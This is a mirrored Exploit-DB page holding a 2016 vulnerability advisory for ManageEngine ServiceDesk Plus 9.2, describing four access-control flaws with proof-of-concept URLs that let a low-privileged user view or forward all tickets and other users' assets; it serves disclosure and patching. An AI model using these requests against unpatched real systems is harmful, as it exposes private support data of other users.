bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/java/webapps/40569.txt
Offensive Security 557f116d02 DB: 2016-10-19 
8 new exploits

TikiWiki 1.9 Sirius - (jhot.php) Remote Command Execution
TikiWiki 1.9 Sirius - 'jhot.php' Remote Command Execution

TikiWiki 1.9.5 Sirius - (sort_mode) Information Disclosure
TikiWiki 1.9.5 Sirius - 'sort_mode' Information Disclosure

TikiWiki 1.9.8 - tiki-graph_formula.php Command Execution
TikiWiki 1.9.8 - 'tiki-graph_formula.php' Command Execution

TikiWiki < 1.9.9 - tiki-listmovies.php Directory Traversal
TikiWiki < 1.9.9 - 'tiki-listmovies.php' Directory Traversal
TikiWiki Project 1.8 - tiki-switch_theme.php theme Parameter Cross-Site Scripting
TikiWiki Project 1.8 - img/wiki_up Arbitrary File Upload
TikiWiki Project 1.8 - tiki-map.phtml Traversal Arbitrary File / Directory Enumeration
TikiWiki Project 1.8 - 'tiki-switch_theme.php' theme Parameter Cross-Site Scripting
TikiWiki Project 1.8 - 'img/wiki_up' Arbitrary File Upload
TikiWiki Project 1.8 - 'tiki-map.phtml' Traversal Arbitrary File / Directory Enumeration
TikiWiki Project 1.8 - categorize.php Direct Request Full Path Disclosure
TikiWiki Project 1.8 - messu-mailbox.php Multiple Parameter Cross-Site Scripting
TikiWiki Project 1.8 - messu-read.php Multiple Parameter Cross-Site Scripting
TikiWiki Project 1.8 - tiki-read_article.php articleId Parameter Cross-Site Scripting
TikiWiki Project 1.8 - tiki-browse_categories.php parentId Parameter Cross-Site Scripting
TikiWiki Project 1.8 - tiki-index.php comments_threshold Parameter Cross-Site Scripting
TikiWiki Project 1.8 - tiki-print_article.php articleId Parameter Cross-Site Scripting
TikiWiki Project 1.8 - tiki-list_file_gallery.php galleryID Parameter Cross-Site Scripting
TikiWiki Project 1.8 - 'categorize.php' Direct Request Full Path Disclosure
TikiWiki Project 1.8 - 'messu-mailbox.php' Multiple Parameter Cross-Site Scripting
TikiWiki Project 1.8 - 'messu-read.php' Multiple Parameter Cross-Site Scripting
TikiWiki Project 1.8 - 'tiki-read_article.php' articleId Parameter Cross-Site Scripting
TikiWiki Project 1.8 - 'tiki-browse_categories.php' parentId Parameter Cross-Site Scripting
TikiWiki Project 1.8 - 'tiki-index.php' comments_threshold Parameter Cross-Site Scripting
TikiWiki Project 1.8 - 'tiki-print_article.php' articleId Parameter Cross-Site Scripting
TikiWiki Project 1.8 - 'tiki-list_file_gallery.php' galleryID Parameter Cross-Site Scripting
TikiWiki Project 1.8 - tiki-upload_file.php galleryID Parameter Cross-Site Scripting
TikiWiki Project 1.8 - tiki-view_faq.php faqId Parameter Cross-Site Scripting
TikiWiki Project 1.8 - tiki-view_chart.php chartId Parameter Cross-Site Scripting
TikiWiki Project 1.8 - tiki-usermenu.php sort_mode Parameter SQL Injection
TikiWiki Project 1.8 - tiki-list_file_gallery.php sort_mode Parameter SQL Injection
TikiWiki Project 1.8 - 'tiki-upload_file.php' galleryID Parameter Cross-Site Scripting
TikiWiki Project 1.8 - 'tiki-view_faq.php' faqId Parameter Cross-Site Scripting
TikiWiki Project 1.8 - 'tiki-view_chart.php' chartId Parameter Cross-Site Scripting
TikiWiki Project 1.8 - 'tiki-usermenu.php' sort_mode Parameter SQL Injection
TikiWiki Project 1.8 - 'tiki-list_file_gallery.php' sort_mode Parameter SQL Injection

Symantec pcAnywhere 12.5.0 Windows (x86) - Remote Code Execution
Symantec pcAnywhere 12.5.0 (Windows x86) - Remote Code Execution

Microsoft Windows (x86) - 'afd.sys' Privilege Escalation (MS11-046)
Pluck CMS 4.7.3 - Cross-Site Request Forgery (Add Page)
LanSpy 2.0.0.155 - Local Buffer Overflow
ManageEngine ServiceDesk Plus 9.2 Build 9207 - Unauthorized Information Disclosure
Cgiemail 1.6 - Source Code Disclosure
Windows DFS Client Driver - Arbitrary Drive Mapping Privilege Escalation (MS16-123)
Windows DeviceApi CMApi PiCMOpenDeviceKey - Arbitrary Registry Key Write Privilege Escalation (MS16-124)
Windows DeviceApi CMApi - User Hive Impersonation Privilege Escalation (MS16-124)
2016-10-19 05:01:18 +00:00

80 lines
No EOL
2.7 KiB
Text
Executable file
Raw Blame History

Title: ManageEngine ServiceDesk Plus Low Privileged User View All Tickets
Date: 18 October 2016
Author: p0z
Vendor: ManageEngine
Vendor Homepage: https://www.manageengine.com/
Product: ServiceDesk Plus
Version: 9.2 Build 9207 (Other versions could also be affected)
Fixed Version: 9.2 Build 9228 (Released on: 29 September 2016)
URL readme fixed version: https://www.manageengine.com/products/service-desk/readme-9.2.html
Vendor ID report: SD-63280, SD-63281, SD-63282, SD-63283
Product Introduction
==========================
ServiceDesk Plus is ITIL-ready help desk software with integrated Assetand Project Management capabilities.
With advanced ITSM functionality and easy-to-use capability, ServiceDesk Plus helps IT support teams deliver
world-class service to end users with reduced costs and complexity. It comes in three editions and is available
in 29 different languages. Over 100,000 organizations, across 185 countries, trust ServiceDesk Plus to optimize
IT service desk performance and achieve high end user satisfaction.
Source: https://www.manageengine.com/products/service-desk/
Vulnerability Information
==========================
Class: Improper Privilege Management
Impact: Low privileged user can access sensetive data
Remotely Exploitable: Yes
Authentication Required: Yes
User interaction required: Yes
CVE Name: N/A
Vulnerability Description
==========================
A user with low privileged can be able view all requests/tickets (include attachments).
Vulnerability Details
==========================
SD-63280:
Low privileged user can change value for "notifyTo" variable to "REQFORWARD" and get advanced features.
After, user can change ticket id (variable "id") and see all request include attachments, and
send (forward) to email.
SD-63281:
Using low privileged user can send "Submit for Approval" e-mail even if the user don't have a necessary permission
to view the request.
SD-63282:
Using low privileged user can able to view the other user's assets by using the below URL.
(Able to view the associated assets of administrator user using guest login)
SD-63283:
Low privileged user can change value for "viewType" variable to "All" and see preview all requests.
Proof-of-Concept
==========================
SD-63280:
http://localhost:9090/SDNotify.do?notifyModule=Request&mode=E-Mail&id=1&notifyTo=REQFORWARD
SD-63281:
http://localhost:9090/SubmitForApproval.do?ITEMID=1&MODULE=Request
SD-63282:
http://localhost:9090/UserAssets.do?userId=3
SD-63283:
http://localhost:9090/ListRequests.do?reqId=1&viewType=All
Timeline
==========================
09-04-2016: Notification Vendor.
02-06-2016: Vendor set ID's vulnerability.
29-09-2016: Vulnerability fixed.
Reference in a new issue View git blame Copy permalink